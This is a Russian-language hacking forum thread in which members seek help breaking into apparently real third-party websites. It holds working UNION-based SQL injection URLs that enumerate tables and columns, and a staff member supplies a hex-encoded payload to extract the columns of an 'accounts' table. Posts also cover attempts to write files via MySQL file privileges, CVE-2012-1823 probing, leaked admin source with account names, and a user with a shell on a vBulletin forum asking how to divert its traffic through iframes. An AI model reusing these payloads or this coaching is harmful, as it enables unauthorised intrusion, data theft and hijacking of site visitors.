Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    В общем есть root phmyadm с file_priv, есть phpinfo. Папок с правами на запись не нашел, какие есть варианты кроме как искать lfi?
     
  2. Dr.D0z1k

    Dr.D0z1k New Member

    Joined:
    19 Apr 2013
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    Имеется MySQL5 инъекция, мускул крутится на Win server 2008. Веб сервак - 80/tcp open http Microsoft IIS httpd 7.0.
    file_priv=y, но кавычки не пролазят.
    PHP - 5.2.17 (старый)
    В нем есть этот баг: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0831
    Тоесть можно отключить MQ? Если да - можно попробовать записать файл.
    Есть варианты залится?

    Еще удалось прочитать исходник:

    admin/index.php
    PHP:
    <?
    include_once(
    "../cfg.php");
    NS::ExtractVars("user","pwd","a");

    if(
    Admin::ChkUser(@$_COOKIE["_authChkUser_"],@$_COOKIE["_authChkPwd_"]))
    {
    if (@
    $_COOKIE["_authChkUser_"] == 'e@ug!ene_ok482' || @$_COOKIE["_authChkUser_"] == 'e@ka!terina_ab358' || @$_COOKIE["_authChkUser_"] == 'x@en!ia5_ve791')
    {
    header("Location: ".ROOT_ADMIN_HTTP."representatives.php");
    }
    else
    {
    header("Location: ".ROOT_ADMIN_HTTP."start.php");
    }
    }
    elseif(!
    $a)
    {
    ob_start();
    ?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="content-type" content="text/html; charset=<?=Site::GetCharset()?>" />
    <link rel="stylesheet" type="text/css" href="<?=CSS_ADMIN_HTTP?>styles.css" media="screen" />
    </head>
    <body>
    <center>
    <img src="<?=IMG_ADMIN_HTTP?>1x1.gif" width='1px' height='300px'>
    <h1> <span class='red'>Project</span class='black'> <span>Manager</span> </h1>
    <form action='<?=ROOT_ADMIN_HTTP?>index.php' method="POST">
    <input type='hidden' name='a' value='enter'>
    <table border='0'>
    <tr><td align='right'>User:</td><td align='center'><input type='text' name='user' value='' maxlength='100'></td></tr>
    <tr><td align='right'>Password:</td><td align='center'><input type='password' name='pwd' value='' maxlength='100'></td></tr>
    <tr><td align='center' colspan='2'><input type='submit' value='Enter'></td></tr>
    </table>
    </form>
    </center>
    </body>
    </html>
    <?
    $ret = ob_get_clean();
    echo $ret;
    }
    elseif($a == 'enter')
    {
    if(Admin::ChkUser($user, md5($pwd)))
    {
    Cookie::Set("_authChkUser_",$user,time()+60*60*24);
    Cookie::Set("_authChkPwd_",md5($pwd),time()+60*60*24);
    if ($user == 'e@ug!ene_ok482' || $user == 'e@ka!terina_ab358' || $user == 'x@en!ia5_ve791')
    {
    header("Location: ".ROOT_ADMIN_HTTP."representatives.php");
    }
    else
    {
    header("Location: ".ROOT_ADMIN_HTTP."start.php");
    }
    }
    else
    {
    header("Location: ".ROOT_ADMIN_HTTP."index.php");
    }
    }
    elseif($a == 'exit')
    {
    Cookie::Delete("_authChkUser_");
    Cookie::Delete("_authChkPwd_");
    header("Location: ".ROOT_ADMIN_HTTP."index.php");
    }
    die;
    ?>
    Мне почему-то кажется, что он уязвим, не?

    И ещё туда же:
    http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1823
    5.2.17 - уязвим.
    в phpinfo()
    index.php?-s ничего не изменило. вай?
    Спасибо.
     
    1 person likes this.
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Dr.D0z1k - например, пропатчено =/
     
    _________________________
  4. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Подскажите на какую партнёрку лучше сливать траф?Можна в личку.
     
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    этот вопрос не имеет никакого отношения к теме
     
  6. LomasterII

    LomasterII New Member

    Joined:
    7 Jan 2013
    Messages:
    23
    Likes Received:
    4
    Reputations:
    5
    есть инъекция
    так работает нормально

    ?menu=95&add=50110339+and+1=0+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables+--+

    названия таблиц выводятся в столбик, есть таблица accounts,но я не могу вывести названия столбцов. Вывод ошибки тут отсутствует
    пробовал так:

    ?menu=95&add=50110339+and+1=0+union+select+1,column_name,3,4,5,6,7,8+from+information_schema.columns+where+table_name='accounts'+--+

    не выходит
    а так выводится огромное кол-во столбцов:

    ?menu=95&add=50110339+and+1=0+union+select+1,column_name,3,4,5,6,7,8+from+information_schema.columns+--+


    как мне вывести именно accounts?
    пробовал в hex переводить, кавычки ставить/убирать, не получается
     
  7. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Скорее всего у вас MQ включены.

    Следовательно, надо использовать запросы вида

    menu=95&add=50110339+and+1=0+union+select+1,column_name,3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x6163636f756e7473+--+
     
    _________________________
  8. LomasterII

    LomasterII New Member

    Joined:
    7 Jan 2013
    Messages:
    23
    Likes Received:
    4
    Reputations:
    5
    Спасибо!
     
  9. eksin

    eksin Elder - Старейшина

    Joined:
    26 Sep 2011
    Messages:
    64
    Likes Received:
    30
    Reputations:
    39
    Люди помогите раскрутить или подскажите в какую сторону крутить postgresql , при post запросе :

    login=1%27%22

    выкидывает ошибку :

    Warning: pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ÎØÈÁÊÀ: îøèáêà ñèíòàêñèñà (ïðèìåðíîå ïîëîæåíèå: &quot;\&quot;)
    LINE 1: ...SR_PASS&quot; FROM main.&quot;RTH_WEBUSRS&quot; WHERE &quot;WEBUSR_NAME&quot;='1\'\&quot;'
    ^ in C:\Program Files (x86)\Apache Software Foundation\Apache2.2\htdocs\ххх\login.php on line 25

    а дальше не получается ничего :(
     
    #22129 eksin, 24 Apr 2013
    Last edited: 24 Apr 2013
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    такой вопросец, есть скуля, выводит только числовой резултат, если в выводе есть буквы или знаки то показывает ошибку, нехочется пол дня крутить как блинд, может есть каккие ни будь функции в mysql чтобы перевести строку в числовой вид(например ascii() толтко не символ а всю строку нужно )
    чтобы потом можно было легко переобразовать обратно?
     
    #22130 qaz, 25 Apr 2013
    Last edited: 25 Apr 2013
  11. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    Char не?
     
  12. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    не, лан, спасиб,уже не нужно, скрипт для блинда написал
     
  13. GAiN

    GAiN Elder - Старейшина

    Joined:
    2 Apr 2011
    Messages:
    2,550
    Likes Received:
    172
    Reputations:
    99
    если например я на сайте нашел поле для ввода даты и там select начиная от 1900 до 2000, если я подменю это значение через html код на 7777 и отправлю результат, и в базу сохранится он, если результат примется и пройдёт - как это называется? - это sql инъекция ?
     
    #22133 GAiN, 26 Apr 2013
    Last edited: 26 Apr 2013
  14. BlackIce

    BlackIce Elder - Старейшина

    Joined:
    10 Jan 2013
    Messages:
    100
    Likes Received:
    31
    Reputations:
    27
    Скуль инъект - это когда выполняются запросы sql которые ты вводишь. Если запросы не выполняются, то это уже не скуль инъект. Мб xss... Все зависит от фильрации символов и где они выводятся.
     
  15. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Имееться шел на форуме vbulletin, интересует слив трафа с сайта через поисковик на партнёрку,как можна реализовать?
     
  16. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    написать скрипт, опять же не имеет никакого отношения к теме
     
  17. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Слышал что можна как-то через iframe сливать траф,не подскажите как?
     
  18. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    пришедших с поисковых систем кидать на партнёрку.
     
  19. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    OxoTnik а что делает этот фрейм?

     
  20. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Понял,и на этом большое спасибо за помощь.
     
Thread Status:
Not open for further replies.